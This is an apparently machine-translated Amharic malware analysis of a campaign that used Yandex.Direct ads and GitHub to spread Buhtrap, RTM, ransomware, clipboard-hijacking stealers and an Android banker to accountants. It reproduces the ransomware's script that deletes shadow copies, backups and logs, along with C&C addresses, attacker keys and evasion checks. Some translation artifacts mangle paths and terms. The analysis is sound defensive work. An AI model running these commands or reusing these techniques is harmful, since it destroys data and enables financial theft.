የኋላ በር እና ቡህትራፕ ኢንክሪፕተር በYandex.Direct በመጠቀም ተሰራጭቷል።

በሳይበር ጥቃት ውስጥ የሂሳብ ባለሙያዎችን ለማነጣጠር በመስመር ላይ የሚፈልጓቸውን የስራ ሰነዶች መጠቀም ይችላሉ። ይህ በግምት ባለፉት ጥቂት ወራት ውስጥ የሳይበር ቡድን የታወቁትን በሮች በማሰራጨት ሲያደርግ የነበረው ነው። ቡህትራፕ и አርኤም, እንዲሁም ኢንክሪፕትተሮች እና የምስጢር ምንዛሬዎችን ለመስረቅ ሶፍትዌር። አብዛኛዎቹ ዒላማዎች በሩሲያ ውስጥ ይገኛሉ. ጥቃቱ የተፈፀመው ተንኮል አዘል ማስታወቂያዎችን በ Yandex.Direct ላይ በማስቀመጥ ነው። ሊሆኑ የሚችሉ ተጎጂዎች እንደ ሰነድ አብነት የተመሰለውን ተንኮል አዘል ፋይል እንዲያወርዱ ወደተጠየቁበት ድር ጣቢያ ተመርተዋል። ከማስጠንቀቂያችን በኋላ Yandex ተንኮል አዘል ማስታወቂያውን አስወግዶታል።

የBuhtrap የምንጭ ኮድ ከዚህ ቀደም በመስመር ላይ ስለተለቀቀ ማንም ሊጠቀምበት ይችላል። የRTM ኮድ መገኘትን በተመለከተ ምንም መረጃ የለንም።

በዚህ ልጥፍ ውስጥ አጥቂዎቹ Yandex.Direct ን በመጠቀም ማልዌርን እንዴት እንዳሰራጩ እና በ GitHub ላይ እንዳስተናገዱ እንነግርዎታለን። ልጥፉ በተንኮል አዘል ዌር ቴክኒካዊ ትንታኔ ይደመደማል።

ቡህትራፕ እና አርቲኤም ወደ ስራ ተመልሰዋል።

የስርጭት እና የተጎጂዎች ዘዴ

ለተጎጂዎች የሚደርሱት የተለያዩ የደመወዝ ጭነቶች የጋራ ስርጭት ዘዴን ይጋራሉ። በአጥቂዎች የተፈጠሩ ሁሉም ተንኮል አዘል ፋይሎች በሁለት የተለያዩ የ GitHub ማከማቻዎች ውስጥ ተቀምጠዋል።

በተለምዶ፣ ማከማቻው አንድ ሊወርድ የሚችል ተንኮል አዘል ፋይል ይዟል፣ እሱም በተደጋጋሚ የሚቀየር። GitHub በማጠራቀሚያ ላይ የተደረጉ ለውጦችን ታሪክ እንዲመለከቱ ስለሚፈቅድ፣ ማልዌር በተወሰነ ጊዜ ውስጥ ምን እንደተሰራጨ ማየት እንችላለን። ተጎጂውን ተንኮል አዘል ፋይል እንዲያወርድ ለማሳመን ከላይ በስዕሉ ላይ የሚታየው blanki-shabloni24[.]ru የተሰኘው ድህረ ገጽ ስራ ላይ ውሏል።

የጣቢያው ንድፍ እና ሁሉም የተንኮል አዘል ፋይሎች ስሞች አንድ ጽንሰ-ሀሳብ ይከተላሉ - ቅጾች, አብነቶች, ኮንትራቶች, ናሙናዎች, ወዘተ .... Buhtrap እና RTM ሶፍትዌር ቀደም ሲል በሂሳብ ባለሙያዎች ላይ በሚሰነዘር ጥቃቶች ላይ ጥቅም ላይ እንደዋሉ ግምት ውስጥ ያስገባን. በአዲሱ ዘመቻ ውስጥ ያለው ስልት ተመሳሳይ ነው. ብቸኛው ጥያቄ ተጎጂው ወደ አጥቂዎቹ ድረ-ገጽ እንዴት እንደደረሰ ነው.

ኢንፌክሽን

በዚህ ድረ-ገጽ ላይ ያበቁት ቢያንስ በርካታ ተጠቂዎች በተንኮል አዘል ማስታወቂያ ተስበው ነበር። ከዚህ በታች የዩአርኤል ምሳሌ ነው።

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

ከአገናኙ ላይ እንደምታዩት ባነር በህጋዊ የሂሳብ ፎረም bb.f2[.]kz ላይ ተለጠፈ። ባነሮቹ በተለያዩ ድረ-ገጾች ላይ መታየታቸውን ልብ ማለት ያስፈልጋል፣ ሁሉም ተመሳሳይ የዘመቻ መታወቂያ (blanki_rsya) ነበራቸው፣ እና ከሂሳብ አያያዝ ወይም ከህግ ድጋፍ አገልግሎቶች ጋር የተያያዙ ናቸው። ዩአርኤሉ የሚያሳየው ተጎጂው የእኛን የታለሙ ጥቃቶች መላምት የሚደግፈውን “የወረዱ የክፍያ መጠየቂያ ቅጽ” ጥያቄን እንደተጠቀመ ያሳያል። ከታች ያሉት ባነሮች የታዩባቸው ጣቢያዎች እና ተዛማጅ የፍለጋ መጠይቆች ናቸው።

• የክፍያ መጠየቂያ ቅጽ አውርድ - bb.f2[.] kz
• የናሙና ውል - Ipopen[.] ru
• የመተግበሪያ ቅሬታ ናሙና - 77metrov[.] ru
• የስምምነት ቅጽ - ባዶ-dogovor-kupli-prodazhi[.] ru
• የናሙና ፍርድ ቤት አቤቱታ - zen.yandex[.] ru
• የናሙና ቅሬታ - yurday[.] ru
• የናሙና የኮንትራት ቅጾች - Regforum[.] ru
• የኮንትራት ቅጽ - assistentus[.] ru
• የናሙና አፓርታማ ስምምነት - napravah[.] ኮም
• የሕግ ኮንትራቶች ናሙናዎች - avito[.] ru

የ blanki-shabloni24[.] ru ጣቢያ ቀላል የእይታ ግምገማን ለማለፍ የተዋቀረ ሊሆን ይችላል። በተለምዶ፣ ወደ GitHub አገናኝ ያለው ፕሮፌሽናል ወደሚመስለው ጣቢያ የሚጠቁም ማስታወቂያ በግልጽ መጥፎ ነገር አይመስልም። በተጨማሪም አጥቂዎቹ ተንኮል አዘል ፋይሎችን ወደ ማከማቻው የሰቀሉት ለተወሰነ ጊዜ ብቻ ነው፣ በዘመቻው ወቅት ሊሆን ይችላል። ብዙ ጊዜ የ GitHub ማከማቻ ባዶ ዚፕ ማህደር ወይም ባዶ EXE ፋይል ይዟል። ስለዚህ አጥቂዎች ማስታወቂያን በ Yandex.Direct በኩል ለተወሰኑ የፍለጋ ጥያቄዎች ምላሽ በመጡ የሂሳብ ባለሙያዎች ሊጎበኙ በሚችሉ ጣቢያዎች ላይ ማሰራጨት ይችላሉ።

በመቀጠል፣ በዚህ መንገድ የተከፋፈሉትን የተለያዩ ሸክሞችን እንመልከት።

የክፍያ ትንተና

የዘመን አቆጣጠር

ተንኮል አዘል ዘመቻው በጥቅምት 2018 መገባደጃ ላይ ተጀምሯል እና በሚጽፉበት ጊዜ ንቁ ነው። ሙሉው ማከማቻ በ GitHub ላይ በይፋ የሚገኝ በመሆኑ፣ የስድስት የተለያዩ የማልዌር ቤተሰቦች ስርጭት ትክክለኛ የጊዜ መስመር አዘጋጅተናል (ከዚህ በታች ያለውን ምስል ይመልከቱ)። ከጂት ታሪክ ጋር ለማነፃፀር በESET ቴሌሜትሪ ሲለካ የባነር ማገናኛ መቼ እንደተገኘ የሚያሳይ መስመር አክለናል። እንደሚመለከቱት ፣ ይህ በ GitHub ላይ ካለው የክፍያ ጭነት ተገኝነት ጋር በጥሩ ሁኔታ ይዛመዳል። በየካቲት መጨረሻ ላይ የተፈጠረውን አለመግባባት ሙሉ በሙሉ ከማግኘታችን በፊት ማከማቻው ከ GitHub ስለተወገደ የለውጥ ታሪክ አካል ስላልነበረን ሊገለጽ ይችላል።

ምስል 1. የማልዌር ስርጭት የዘመን ቅደም ተከተል.

የኮድ ፊርማ የምስክር ወረቀቶች

ዘመቻው በርካታ የምስክር ወረቀቶችን ተጠቅሟል። አንዳንዶቹ ከአንድ በላይ በሆኑ የማልዌር ቤተሰብ የተፈረሙ ሲሆን ይህም የተለያዩ ናሙናዎች የአንድ ዘመቻ አባል መሆናቸውን በይበልጥ ይጠቁማል። የግል ቁልፉ ቢኖርም ኦፕሬተሮች ስልታዊ በሆነ መንገድ ሁለትዮሾችን አልፈረሙም እና ለሁሉም ናሙናዎች ቁልፉን አልተጠቀሙበትም። እ.ኤ.አ. በፌብሩዋሪ 2019 መጨረሻ ላይ አጥቂዎች የግል ቁልፍ ያልነበራቸው የGoogle ባለቤትነት ማረጋገጫ ሰርተፍኬት በመጠቀም ልክ ያልሆኑ ፊርማዎችን መፍጠር ጀመሩ።

በዘመቻው ውስጥ የተሳተፉ ሁሉም የምስክር ወረቀቶች እና የሚፈርሙባቸው የማልዌር ቤተሰቦች ከዚህ በታች ባለው ሠንጠረዥ ውስጥ ተዘርዝረዋል።

ከሌሎች የማልዌር ቤተሰቦች ጋር ግንኙነት ለመመስረት እነዚህን የኮድ ፊርማ ሰርተፊኬቶች ተጠቅመናል። ለአብዛኛዎቹ የምስክር ወረቀቶች፣ በGitHub ማከማቻ ያልተከፋፈሉ ናሙናዎችን አላገኘንም። ነገር ግን የTOV "MARIYA" ሰርተፍኬት የbotnet ንብረት የሆነውን ማልዌር ለመፈረም ጥቅም ላይ ውሏል ዋውቾስ፣ አድዌር እና ማዕድን አውጪዎች። ይህ ተንኮል አዘል ዌር ከዚህ ዘመቻ ጋር የተዛመደ አይደለም ማለት አይቻልም። ምናልባትም የምስክር ወረቀቱ የተገዛው በጨለማ መረብ ላይ ነው።

Win32/ፋይልኮደር.Buhtrap

ትኩረታችንን የሳበው የመጀመሪያው አካል አዲስ የተገኘው Win32/Filecoder.Buhtrap ነው። ይህ አንዳንድ ጊዜ የታሸገ የዴልፊ ሁለትዮሽ ፋይል ነው። በዋናነት የተሰራጨው በየካቲት - መጋቢት 2019 ነበር። ለራንሰምዌር ፕሮግራም የሚስማማ ባህሪ አለው - የአካባቢ ድራይቮች እና የአውታረ መረብ ማህደሮችን ይፈልጋል እና የተገኙትን ፋይሎች ያመስጥራል። የኢንክሪፕሽን ቁልፎችን ለመላክ አገልጋዩን ስለማያገናኘው የበይነመረብ ግንኙነትን ለመጣስ አያስፈልገውም። በምትኩ፣ በቤዛው መልእክት መጨረሻ ላይ “ቶከን”ን ይጨምራል፣ እና ኦፕሬተሮችን ለማግኘት ኢሜል ወይም ቢትሜሴጅ መጠቀምን ይጠቁማል።

በተቻለ መጠን ብዙ ስሱ ሃብቶችን ለማመስጠር Filecoder.Buhtrap ምስጠራን የሚያደናቅፉ ጠቃሚ መረጃዎችን የያዙ ክፍት የፋይል ተቆጣጣሪዎች ሊኖሯቸው የሚችሉ ቁልፍ ሶፍትዌሮችን ለመዝጋት የተነደፈ ክር ይሰራል። የዒላማ ሂደቶች በዋናነት የውሂብ ጎታ አስተዳደር ስርዓቶች (DBMS) ናቸው። በተጨማሪም Filecoder.Buhtrap የመረጃ መልሶ ማግኛን አስቸጋሪ ለማድረግ የምዝግብ ማስታወሻ ፋይሎችን እና መጠባበቂያዎችን ይሰርዛል። ይህንን ለማድረግ, ከዚህ በታች ያለውን የቡድን ስክሪፕት ያሂዱ.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap ስለ ድር ጣቢያ ጎብኝዎች መረጃ ለመሰብሰብ የተነደፈ ህጋዊ የመስመር ላይ IP Logger አገልግሎት ይጠቀማል። ይህ የትእዛዝ መስመሩ ኃላፊነት የሆነውን የቤዛውዌር ተጎጂዎችን ለመከታተል የታሰበ ነው፡-

mshta.exe "javascript:document.write('');"

የማመስጠር ፋይሎች የሚመረጡት ከሶስት የማግለል ዝርዝሮች ጋር የማይዛመዱ ከሆነ ነው። በመጀመሪያ፣ የሚከተሉት ቅጥያዎች ያላቸው ፋይሎች አልተመሰጠሩም፡ .com፣ .cmd፣ .cpl፣ .dll፣ .exe፣ .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys እና .የሌሊት ወፍ. በሁለተኛ ደረጃ ፣ ሙሉ ዱካው የማውጫ ሕብረቁምፊዎችን የያዘባቸው ሁሉም ፋይሎች ከዚህ በታች ካለው ዝርዝር ውስጥ አይካተቱም።

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

ሦስተኛ፣ የተወሰኑ የፋይል ስሞችም ከመመስጠር የተገለሉ ናቸው፣ ከእነዚህም መካከል የቤዛው መልእክት ፋይል ስም። ዝርዝሩ ከዚህ በታች ቀርቧል። በግልጽ እንደሚታየው እነዚህ ሁሉ ልዩ ሁኔታዎች ማሽኑ እንዲሠራ ለማድረግ የታቀዱ ናቸው ፣ ግን በትንሹ የመንገድ ብቁነት።

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

የፋይል ምስጠራ ዘዴ

አንዴ ከተፈጸመ፣ ማልዌሩ ባለ 512-ቢት የRSA ቁልፍ ጥንድ ያመነጫል። ከዚያም የግል ገላጭ (መ) እና ሞዱል (n) በደረቅ ኮድ 2048-ቢት የህዝብ ቁልፍ (የወል ገላጭ እና ሞዱል)፣ ዝሊብ የታሸገ እና ቤዝ64 ኮድ የተመሰጠሩ ናቸው። ለዚህ ተጠያቂው ኮድ በስእል 2 ይታያል.

ምስል 2. የ 512-ቢት RSA ቁልፍ ጥንድ የማመንጨት ሂደት የሄክስ-ሬይ መሰባበር ውጤት።

ከዚህ በታች የመነጨ የግል ቁልፍ ያለው ግልጽ ጽሑፍ ምሳሌ ነው፣ እሱም ከቤዛው መልእክት ጋር የተያያዘ።

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

የአጥቂዎቹ የህዝብ ቁልፍ ከዚህ በታች ቀርቧል።

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

ፋይሎቹ በ128-ቢት ቁልፍ AES-256-CBC በመጠቀም የተመሰጠሩ ናቸው። ለእያንዳንዱ የተመሰጠረ ፋይል አዲስ ቁልፍ እና አዲስ ማስጀመሪያ ቬክተር ይፈጠራሉ። ቁልፉ መረጃ በተመሰጠረው ፋይል መጨረሻ ላይ ተጨምሯል። ኢንክሪፕት የተደረገውን ፋይል ቅርጸት እናስብ።
የተመሰጠሩ ፋይሎች የሚከተለው ራስጌ አላቸው፡

ከ VEGA አስማት እሴት በተጨማሪ የምንጭ ፋይል መረጃ ወደ መጀመሪያው 0x5000 ባይት ተመስጥሯል። ሁሉም የዲክሪፕት መረጃ የሚከተለው መዋቅር ካለው ፋይል ጋር ተያይዟል።

- የፋይል መጠን አመልካች ፋይሉ በመጠን ከ 0x5000 ባይት የሚበልጥ መሆኑን የሚያሳይ ምልክት ይዟል
— AES key blob = ZlibCompress(RSAEncrypt(AES key + IV፣የመነጨው የRSA ቁልፍ ጥንድ ይፋዊ ቁልፍ))
- RSA key blob = ZlibCompress(RSAEncrypt(የመነጨ RSA የግል ቁልፍ፣የጠንካራ ኮድ የ RSA የህዝብ ቁልፍ))

Win32/ClipBanker

Win32/ClipBanker ከኦክቶበር መጨረሻ እስከ ታህሳስ መጀመሪያ 2018 ድረስ ያለማቋረጥ የተሰራጨ አካል ነው። የእሱ ሚና የቅንጥብ ሰሌዳውን ይዘቶች መከታተል ነው ፣ እሱ የኪስ ቦርሳዎችን አድራሻ ይፈልጋል። ክሊፕባንከር የታለመውን የኪስ ቦርሳ አድራሻ ከወሰነ በኋላ የኦፕሬተሮች ነው ተብሎ በሚታመን አድራሻ ይተካዋል። የመረመርናቸው ናሙናዎች በቦክስ ወይም በድብቅ አልነበሩም። ባህሪን ለመደበቅ ጥቅም ላይ የሚውለው ብቸኛው ዘዴ የሕብረቁምፊ ምስጠራ ነው። ኦፕሬተር የኪስ ቦርሳ አድራሻዎች RC4 በመጠቀም የተመሰጠሩ ናቸው። ዒላማ cryptocurrencies Bitcoin፣ Bitcoin cash፣ Dogecoin፣ Ethereum እና Ripple ናቸው።

ተንኮል አዘል ዌር ወደ አጥቂዎቹ Bitcoin ቦርሳዎች እየተሰራጨ በነበረበት ወቅት, ትንሽ መጠን ወደ VTS ተልኳል, ይህም በዘመቻው ስኬት ላይ ጥርጣሬን ይፈጥራል. በተጨማሪም፣ እነዚህ ግብይቶች ከClipBanker ጋር የተያያዙ መሆናቸውን የሚያሳይ ምንም ማስረጃ የለም።

Win32/RTM

የWin32/RTM ክፍል በማርች 2019 መጀመሪያ ላይ ለብዙ ቀናት ተሰራጭቷል። RTM በርቀት የባንክ ስርዓቶች ላይ ያነጣጠረ በዴልፊ የተጻፈ የትሮጃን ባለ ባንክ ነው። በ 2017, የ ESET ተመራማሪዎች ታትመዋል ዝርዝር ትንታኔ የዚህ ፕሮግራም, መግለጫው አሁንም ጠቃሚ ነው. በጃንዋሪ 2019፣ Palo Alto Networks እንዲሁ ተለቋል ስለ RTM የብሎግ ልጥፍ.

ቡህትራፕ ጫኝ

ለተወሰነ ጊዜ፣ ከቀደምት የBuhtrap መሳሪያዎች ጋር የማይመሳሰል ማውረጃ በ GitHub ላይ ይገኛል። ወደ እሱ ዞሯል https://94.100.18[.]67/RSS.php?<some_id> የሚቀጥለውን ደረጃ ለማግኘት እና በቀጥታ ወደ ማህደረ ትውስታ ይጫኑት. የሁለተኛው ደረጃ ኮድ ሁለት ባህሪያትን መለየት እንችላለን. በመጀመሪያው ዩአርኤል፣ RSS.php የBuhtrap backdoorን በቀጥታ አለፈ - ይህ የኋላ በር የምንጭ ኮድ ከተለቀቀ በኋላ ካለው ጋር በጣም ተመሳሳይ ነው።

የሚገርመው፣ ከቡህትራፕ የኋላ በር ጋር ብዙ ዘመቻዎችን እናያለን፣ እና በተለያዩ ኦፕሬተሮች ነው የሚተዳደሩት ተብሏል። በዚህ ጉዳይ ላይ ዋናው ልዩነት የጀርባው በር በቀጥታ ወደ ማህደረ ትውስታ ተጭኗል እና ከተነጋገርነው የዲኤልኤል ማሰማራት ሂደት ጋር የተለመደውን እቅድ አይጠቀምም. ቀደም ብሎ. በተጨማሪም ኦፕሬተሮቹ የኔትወርክ ትራፊክን ለማመሳጠር ጥቅም ላይ የዋለውን የRC4 ቁልፍ ወደ ሲ&ሲ አገልጋይ ለውጠዋል። በአብዛኛዎቹ ባየናቸው ዘመቻዎች ኦፕሬተሮች ይህን ቁልፍ ለመቀየር አልተቸገሩም።

ሁለተኛው፣ በጣም ውስብስብ ባህሪ RSS.php URL ወደ ሌላ ጫኚ መተላለፉ ነው። እንደ ተለዋዋጭ የማስመጣት ሰንጠረዡን እንደገና በመገንባት ላይ ያሉ አንዳንድ ማደብዘዝን ተግባራዊ አድርጓል። የቡት ጫኚው አላማ የC&C አገልጋይን ማግኘት ነው። msiofficeupd[.]com/api/F27F84EDA4D13B15/2፣ ምዝግብ ማስታወሻዎቹን ይላኩ እና ምላሽ ይጠብቁ። ምላሹን እንደ ነጠብጣብ ያስኬዳል, ወደ ማህደረ ትውስታ ይጭናል እና ያስፈጽማል. ይህን ጫኝ ሲሰራ ያየነው የደመወዝ ጭነት ያው ​​የBuhtrap backdoor ቢሆንም ሌሎች አካላት ሊኖሩ ይችላሉ።

አንድሮይድ/Spy.Banker

የሚገርመው፣ ለ Android አንድ አካል በ GitHub ማከማቻ ውስጥም ተገኝቷል። በዋናው ቅርንጫፍ ውስጥ ለአንድ ቀን ብቻ ነበር - ህዳር 1, 2018. በ GitHub ላይ ከተለጠፈ በተጨማሪ፣ ESET ቴሌሜትሪ ይህ ማልዌር መሰራጨቱን የሚያሳይ ምንም ማስረጃ አላገኘም።

ክፍሉ የተስተናገደው እንደ አንድሮይድ መተግበሪያ ጥቅል (ኤፒኬ) ነው። በጣም የተደበቀ ነው። ተንኮል አዘል ባህሪው በኤፒኬ ውስጥ በሚገኝ ኢንክሪፕት የተደረገ JAR ውስጥ ተደብቋል። ይህንን ቁልፍ በመጠቀም በRC4 የተመሰጠረ ነው፡-

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

ሕብረቁምፊዎችን ለማመስጠር ተመሳሳይ ቁልፍ እና አልጎሪዝም ጥቅም ላይ ይውላሉ። JAR የሚገኘው በ ውስጥ ነው። APK_ROOT + image/files. የፋይሉ የመጀመሪያዎቹ 4 ባይት ኢንክሪፕት የተደረገው JAR ርዝመት ይይዛል፣ ይህም ከርዝመት መስኩ በኋላ ወዲያውኑ ይጀምራል።

ፋይሉን ዲክሪፕት ካደረግን በኋላ፣ አኑቢስ መሆኑን ደርሰንበታል - ከዚህ ቀደም በሰነድ የተደገፈ የባንክ ሰራተኛ ለ Android. ማልዌር የሚከተሉትን ባህሪዎች አሉት

• ማይክሮፎን መቅዳት
• ቅጽበታዊ ገጽ እይታዎችን ማንሳት
• የጂፒኤስ መጋጠሚያዎችን ማግኘት
• ኪይሎገር
• የመሣሪያ ውሂብ ምስጠራ እና ቤዛ ፍላጎት
• አይፈለጌ መልእክት በመላክ ላይ

የሚገርመው፣ የባንክ ሰራተኛው ሌላ C&C አገልጋይ ለማግኘት ትዊተርን እንደ ምትኬ የመገናኛ ቻናል ተጠቅሟል። የተተነተነው ናሙና የ @JonesTrader መለያን ተጠቅሟል ነገርግን በመተንተን ጊዜ አስቀድሞ ታግዷል።

ባለባንኩ በአንድሮይድ መሳሪያ ላይ የታለሙ አፕሊኬሽኖች ዝርዝር ይዟል። በሶፎስ ጥናት ውስጥ ከተገኘው ዝርዝር የበለጠ ረዘም ያለ ነው. ዝርዝሩ ብዙ የባንክ አፕሊኬሽኖችን፣ የመስመር ላይ ግብይት ፕሮግራሞችን እንደ አማዞን እና ኢቤይ እና የምስጠራ አገልግሎቶችን ያካትታል።

MSIL/ClipBanker.IH

የዚህ ዘመቻ አካል ሆኖ የተሰራጨው የመጨረሻው ክፍል በማርች 2019 የወጣው .NET Windows executable ነው። አብዛኛዎቹ የተጠኑት ስሪቶች በConfuserEx v1.0.0 የታሸጉ ናቸው። ልክ እንደ ClipBanker፣ ይህ አካል ቅንጥብ ሰሌዳውን ይጠቀማል። የእሱ ግቡ ብዙ አይነት ክሪፕቶ ምንዛሬዎች፣ እንዲሁም በSteam ላይ ቅናሾች ናቸው። በተጨማሪም፣ የBitcoin የግል ዋይፍ ቁልፍን ለመስረቅ የአይፒ ሎገር አገልግሎትን ይጠቀማል።

የመከላከያ ዘዴዎች
ConfuserEx ማረምን፣ መጣልን እና ማረምን በመከላከል ከሚሰጠው ጥቅም በተጨማሪ ተቋሙ የፀረ-ቫይረስ ምርቶችን እና ቨርቹዋል ማሽኖችን የመለየት ችሎታን ያካትታል።

በቨርቹዋል ማሽን ውስጥ መስራቱን ለማረጋገጥ ማልዌሩ አብሮ የተሰራውን የዊንዶውስ WMI የትእዛዝ መስመር (WMIC) በመጠቀም የባዮስ መረጃን ለመጠየቅ ይጠቀማል፡-

wmic bios

ከዚያ ፕሮግራሙ የትዕዛዙን ውጤት ይተነትናል እና ቁልፍ ቃላትን ይፈልጋል-VBOX ፣ VirtualBox ፣ XEN ፣ qemu ፣ bochs ፣ VM።

የጸረ-ቫይረስ ምርቶችን ለማግኘት ማልዌር በመጠቀም የዊንዶውስ አስተዳደር መሳሪያ (WMI) ጥያቄን ወደ ዊንዶውስ ሴኪዩሪቲ ሴንተር ይልካል ManagementObjectSearcher ኤፒአይ ከዚህ በታች እንደሚታየው። ከ base64 ዲኮድ ከወጣ በኋላ ጥሪው ይህን ይመስላል።

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

ምስል 3. የፀረ-ቫይረስ ምርቶችን የመለየት ሂደት.

በተጨማሪም፣ ማልዌር ስለመሆኑ ያረጋግጣል CryptoClipWatcher, ከቅንጥብ ሰሌዳ ጥቃቶች የሚከላከለው መሳሪያ እና እየሮጠ ከሆነ በዛ ሂደት ውስጥ ያሉትን ሁሉንም ክሮች በማገድ ጥበቃውን ያሰናክላል.

ጽናት

ያጠናነው የማልዌር ስሪት በራሱ ቅጂዎች %APPDATA%googleupdater.exe እና ለ google ማውጫ "የተደበቀ" ባህሪን ያዘጋጃል። ከዚያም ዋጋውን ትቀይራለች SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell በዊንዶውስ መዝገብ ውስጥ እና መንገዱን ይጨምራል updater.exe. በዚህ መንገድ ተጠቃሚው በገባ ቁጥር ማልዌር ይፈጸማል።

ተንኮል አዘል ባህሪ

ልክ እንደ ክሊፕባንከር፣ ማልዌር የቅንጥብ ሰሌዳውን ይዘቶች ይከታተላል እና የክሪፕቶፕ ቦርሳ አድራሻዎችን ይፈልጋል፣ እና ሲገኝ ከኦፕሬተሩ አድራሻዎች በአንዱ ይተካዋል። ከዚህ በታች በኮዱ ውስጥ ባለው ነገር ላይ ተመስርተው የታለሙ አድራሻዎች ዝርዝር አለ።

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

ለእያንዳንዱ የአድራሻ አይነት ተጓዳኝ መደበኛ አገላለጽ አለ. የSTEAM_URL እሴቱ የSteam ስርዓቱን ለማጥቃት ጥቅም ላይ ይውላል፣ከመደበኛው አገላለጽ በቋት ውስጥ ለመግለጽ እንደሚቻለው፡

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

የኤክስፍልቴሽን ቻናል

ተንኮል አዘል ዌር በመጠባበቂያው ውስጥ አድራሻዎችን ከመተካት በተጨማሪ የ Bitcoin፣ Bitcoin Core እና Electrum Bitcoin ቦርሳዎችን የግል ዋይኤፍ ቁልፎች ያነጣጠረ ነው። ፕሮግራሙ የWIF የግል ቁልፍ ለማግኘት plogger.orgን እንደ ኤክስፋይ ቻናል ይጠቀማል። ይህንን ለማድረግ ከታች እንደሚታየው ኦፕሬተሮች የግል ቁልፍ ውሂብ ወደ የተጠቃሚ-ወኪል HTTP ራስጌ ያክላሉ።

ምስል 4. የ IP Logger ኮንሶል ከውጤት ውሂብ ጋር.

የኪስ ቦርሳዎችን ለማስወጣት ኦፕሬተሮች iplogger.orgን አልተጠቀሙም። በመስክ ላይ ባለው የ255 ቁምፊ ገደብ ምክንያት ወደ ሌላ ዘዴ ሳይጠቀሙ አልቀሩም። User-Agentበአይፒ ሎገር ድር በይነገጽ ውስጥ ይታያል። ባጠናናቸው ናሙናዎች ውስጥ, ሌላኛው የውጤት አገልጋይ በአከባቢው ተለዋዋጭ ውስጥ ተከማችቷል DiscordWebHook. የሚገርመው, ይህ የአካባቢ ተለዋዋጭ በኮዱ ውስጥ የትኛውም ቦታ አልተመደበም. ይህ የሚያመለክተው ማልዌሩ ገና በመገንባት ላይ እንደሆነ እና ተለዋዋጭው ለኦፕሬተር መሞከሪያ ማሽን ተመድቧል።

